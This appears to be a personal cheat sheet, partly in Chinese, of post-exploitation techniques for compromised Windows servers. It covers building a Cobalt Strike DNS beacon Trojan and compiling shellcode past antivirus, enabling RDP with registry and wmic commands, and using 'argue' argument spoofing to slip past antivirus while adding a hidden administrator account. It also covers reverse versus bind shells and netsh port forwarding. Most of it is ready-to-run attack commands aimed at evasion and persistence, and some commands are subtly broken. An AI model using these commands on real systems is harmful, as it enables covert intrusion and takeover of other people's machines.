1. Find the website path under windows
Visit the website, find a file owned on the website, and then use dir /s /b to search
dir / s /bc:\checkform.js
/S Displays the files in the specified directory and all subdirectories.
/B uses an empty format (no title information or abstract). (For files, only the file name and extension are displayed, this one is more practical!)
2. Determine whether there is a separation of the station library
3. Make DNS Beacon
-
Prepare a VPS server (our CS server can be used directly), and port 53 of the machine must be open to the outside world. Then prepare a domain name.
-
Configure domain name resolution records, create A records and NS records. The A record is resolved to the VPS server, and the NS record is resolved to the A record.
-
CS opens the monitoring DNS Beacon, DNS Hosts fills in our NS record, DNS Host (Stager) fills in our A record.
-
Generate DNS Trojan. The type of Trojan generated is Windows Executable(S). If the Trojan has anti-virus software, you can generate shellcode first, and then compile it without anti-virus.
-
Execute the Trojan horse line.
By uploading an anti-virus dns Trojan, the execution was successful. The default online is a black frame, and the command cannot be executed.
Execute the following two commands to display and execute the commands normally.
checkin
mode dns-txt
4. Open port 3389
Method 1: WinServer2012 to open port 3389 command is as follows:
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
View RDP port
Check the port and
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
get the connection port as 0xd3d, after conversion it is 3389
windows server 2003
On 1:
REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Off:REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
On 2:1,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2,REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3,REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
windows server 2008
Turn on:
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Refer to the article of the boss: https://www.jianshu.com/p/8e7d2f78f5e1
Open and query port 3389
开启3389端口:
通杀:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
2003:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
2008:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
多版本win08 win03 win7 win2012 winxp 执行3条:
1.wmic /namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
2.wmic /namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
3.reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
开了远程桌面找不到?
简单暴力办法看看服务器有木有电话qq之类的,直接联系管理员问问,好好的3389端口非得换,不知道我找不到吗?
不闹了!容易挨打!
1、cmd执行:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2、cmd执行:tasklist /svc查询TermService对应PID,然后在netstat -ano查询的PID对应的端口号
3、查找注册表:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\ Wds dpwd\Tds cp 中PortNumber的值
5. Use the argument parameter to bypass the antivirus software to add users
argue parameter pollution
Use adminstrator or system permissions
Use:
argue [command] [fake arguments]
argue command pollution parameters
使用argue参数污染net1程序(注意是net1,而不是net,因为net还是会把真正的参数传递给net1的)
argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx查看污染参数 argue 用污染的net1执行添加用户操作
execute net1 user hack Root111! /add
execute net1 localgroup administrators hack /add
The argument argument pollutes the powershell.exe command
Direct use of powershell.exe will be blocked
argue powershell.exe xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Run argue again to check the pollution results
Execute executes powershell.exe without interception (shell commands will not succeed, because the shell is essentially cmd.exe /c arguments)
reference:
http://www.0x3.biz/archives/837.html
https://mp.weixin.qq.com/s/dVOBHSWGDUcxnC8g0NWEAg
6. reverse_tcp
And the bind_tcp
difference:
[reverse_tcp]
attacker -> [contact me at the port 4444] -> victim
after the payload is executed
attacker <-> [port 4444] <-> victim
[bind_tcp]
attacker -> [open the way for me in the port 4444] -> victim
after execution
attacker <-> [port 4444] <-> victim
reverse_tcp: The attacker sets a port (LPORT) and IP (LHOST). The payload is executed on the victim machine and connects to the port of the attacker's IP. At this time, if the attacker monitors the port, it will find that the tester is connected.
bind_tcp: The attacker sets a port (LPORT), and the payload is executed on the tester to open the port so that the attacker can access it.
The reverse method is generally safer, because the test machine is connected to the attacker, so it is generally not discovered by the firewall; and bind is easily discovered by the security software and firewall when the test machine opens the port.
If the target machine can access the Internet, use it reverse_tcp
and let the target machine connect to our server to establish a connection.
It bind_tcp
is used when the target machine is in the intranet and cannot be out of the network. Open a port on the target machine that cannot go out of the network for the attacker to connect through the forwarded route.
Refer to the article by the boss: https://blog.csdn.net/adidala/article/details/24117711
7, netsh port forwarding
1. Add port forwarding:
first open the command prompt (cmd)
netsh interface portproxy add v4tov4 listenport=listening port connectaddress=address forwarded to connectport=port forwarded to
Example: netsh interface portproxy add v4tov4 listenport=9988 connectaddress=192.168. 88.110 connectport=9988
2. Check which ports are forwarded
netsh interface portproxy show all
3. Delete the forwarding rule
netsh interface portproxy delete v4tov4 listenaddress=192.168.88.110 listenport=9988
Refer to the big guy article: https://blog.csdn.net/hx7013/article/details/79786407
8, linux background running program
nobhp and & are both background commands